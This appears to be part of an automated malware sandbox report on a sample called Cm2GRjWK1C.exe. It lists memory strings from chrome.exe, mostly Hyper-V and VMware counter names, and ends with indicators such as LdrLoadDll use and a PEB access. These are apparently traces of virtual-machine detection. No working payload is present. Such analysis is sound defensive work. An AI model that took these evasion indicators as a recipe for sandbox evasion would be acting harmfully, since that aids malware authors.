Memory Integration Service
Source: chrome.exe, 00000008.00000003.1415866773.00000241C3394000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417238734.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416826257.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416272678.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417565247.00000241C3396000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416038141.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1467433951.00000241C3372000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417045580.00000241C3395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processorllysq
Source: chrome.exe, 00000008.00000002.1467433951.00000241C3341000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partitione
Source: chrome.exe, 00000008.00000003.1415866773.00000241C3394000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417238734.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416826257.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416272678.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417565247.00000241C3396000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416038141.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1467433951.00000241C3372000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417045580.00000241C3395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisorr
Source: chrome.exe, 00000008.00000003.1415866773.00000241C3394000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417238734.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416826257.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416272678.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417565247.00000241C3396000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416038141.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1467433951.00000241C3372000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417045580.00000241C3395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service+
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000002.1678369352.000000000103E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: chrome.exe, 00000008.00000002.1466824910.00000241C0E28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 00000008.00000003.1420648301.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420014745.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419760405.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419951551.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420402118.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418618943.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419390513.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420768520.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420460629.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419552033.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420168318.00000241C3465000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical ProcessM+
Source: chrome.exe, 00000008.00000003.1415866773.00000241C3394000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417238734.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416826257.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416272678.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417565247.00000241C3396000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416038141.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1467433951.00000241C3372000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417045580.00000241C3395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2Hyper-V VM Vid Partition2
Source: chrome.exe, 00000008.00000002.1467433951.00000241C3372000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ns4806Hyper-V Hypeoa
Source: chrome.exe, 00000008.00000002.1467433951.00000241C3341000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition
Source: chrome.exe, 00000008.00000002.1467433951.00000241C3341000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition
Source: chrome.exe, 00000008.00000002.1467433951.00000241C3341000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipess$
Source: chrome.exe, 00000008.00000002.1467433951.00000241C3372000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: chrome.exe, 00000008.00000002.1467433951.00000241C3341000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 00000008.00000003.1418462618.00000241C33D0000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417238734.00000241C33D6000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416018590.00000241C33CE000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418526897.00000241C33D5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417045580.00000241C33D6000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416826257.00000241C33D6000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1467433951.00000241C3372000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417565247.00000241C33D6000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1415846006.00000241C33CE000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419290033.00000241C33D4000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418866939.00000241C33D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1min9716Runtime Count Infinite3094Hyper-V Virtual Machine Bus Pipes3096Reads/sec3098Writes/sec3100Bytes Read/sec3102Bytes Written/sec9616SMB Direct Connection9618Stalls (Send Credit)/sec
Source: chrome.exe, 00000008.00000002.1466824910.00000241C0E28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: chrome.exe, 00000008.00000003.1415866773.00000241C3394000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416826257.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416272678.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416038141.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417045580.00000241C3395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976HyperT
Source: chrome.exe, 00000008.00000003.1420648301.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420014745.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419760405.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1467433951.00000241C3463000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419951551.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420402118.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418618943.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419390513.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420768520.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420460629.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419552033.00000241C3465000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4
Source: chrome.exe, 00000008.00000003.1416018590.00000241C33CE000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1415846006.00000241C33CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822
Source: chrome.exe, 00000008.00000002.1466824910.00000241C0E7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ::$DATAeHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
Source: chrome.exe, 00000008.00000002.1479243117.00001ECC03A74000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse
Source: chrome.exe, 00000008.00000003.1415866773.00000241C3394000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417238734.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416826257.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416272678.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417565247.00000241C3396000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416038141.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1467433951.00000241C3372000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417045580.00000241C3395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 00000008.00000003.1415866773.00000241C3394000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417238734.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416826257.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416272678.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417565247.00000241C3396000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416038141.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1467433951.00000241C3372000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417045580.00000241C3395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partition
Source: chrome.exe, 00000008.00000002.1477281374.00001ECC03424000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: gle\Chrome\User Data\Default\Download Service\Files\21abf2e3-eeca-436a-8e7b-0eb003e8c149USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=16ad8e3b-ae9e-445f-8351-e2bfa7d65741
Source: chrome.exe, 00000008.00000003.1415866773.00000241C3394000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417238734.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416826257.00000241C3395000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416272678.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417565247.00000241C3396000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1416038141.00000241C338D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1467433951.00000241C3372000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417045580.00000241C3395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 00000008.00000002.1466824910.00000241C0E28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Hypervisor Root Partition
Source: chrome.exe, 00000008.00000002.1467433951.00000241C3341000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partitionlv
Source: chrome.exe, 00000008.00000003.1384486138.00001ECC0257C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: chrome.exe, 00000008.00000002.1466824910.00000241C0E7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: chrome.exe, 00000008.00000002.1477281374.00001ECC03424000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=16ad8e3b-ae9e-445f-8351-e2bfa7d65741
Source: chrome.exe, 00000008.00000002.1464059582.00000241BD18D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: chrome.exe, 00000008.00000003.1420648301.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420014745.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419760405.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1467433951.00000241C3463000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419951551.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420402118.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418618943.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419390513.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420768520.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1420460629.00000241C3465000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1419552033.00000241C3465000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816**
Source: chrome.exe, 00000008.00000002.1466824910.00000241C0E66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V fhthymoloioumux Bus`
Source: chrome.exe, 00000008.00000002.1466824910.00000241C0EAD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processorc.sysp
Source: chrome.exe, 00000008.00000003.1418435381.00000241C3485000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Interc
Source: chrome.exe, 00000008.00000002.1466824910.00000241C0E28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partitione
Source: chrome.exe, 00000008.00000003.1419231556.00000241C34C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: chrome.exe, 00000008.00000002.1466824910.00000241C0E28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus PipesuiG
Source: chrome.exe, 00000008.00000003.1416102848.00000241C33C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 0
Source: chrome.exe, 00000008.00000002.1466824910.00000241C0E28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processorc
Source: chrome.exe, 00000008.00000002.1466824910.00000241C0EAD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: chrome.exe, 00000008.00000002.1467433951.00000241C3372000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processorc
Source: chrome.exe, 00000008.00000002.1466824910.00000241C0EAD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor&
Source: chrome.exe, 00000008.00000002.1467433951.00000241C3341000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V fhthymoloioumux Bus Pipes
Source: chrome.exe, 00000008.00000003.1416367159.00000241C3383000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: arking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: chrome.exe, 00000008.00000003.1418462618.00000241C33D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions CostDL p

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: 0_3_010101A3 LdrLoadDll,

0_3_010101A3

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_2_02C103DD mov edx, dword ptr fs:[00000030h]	0_2_02C103DD
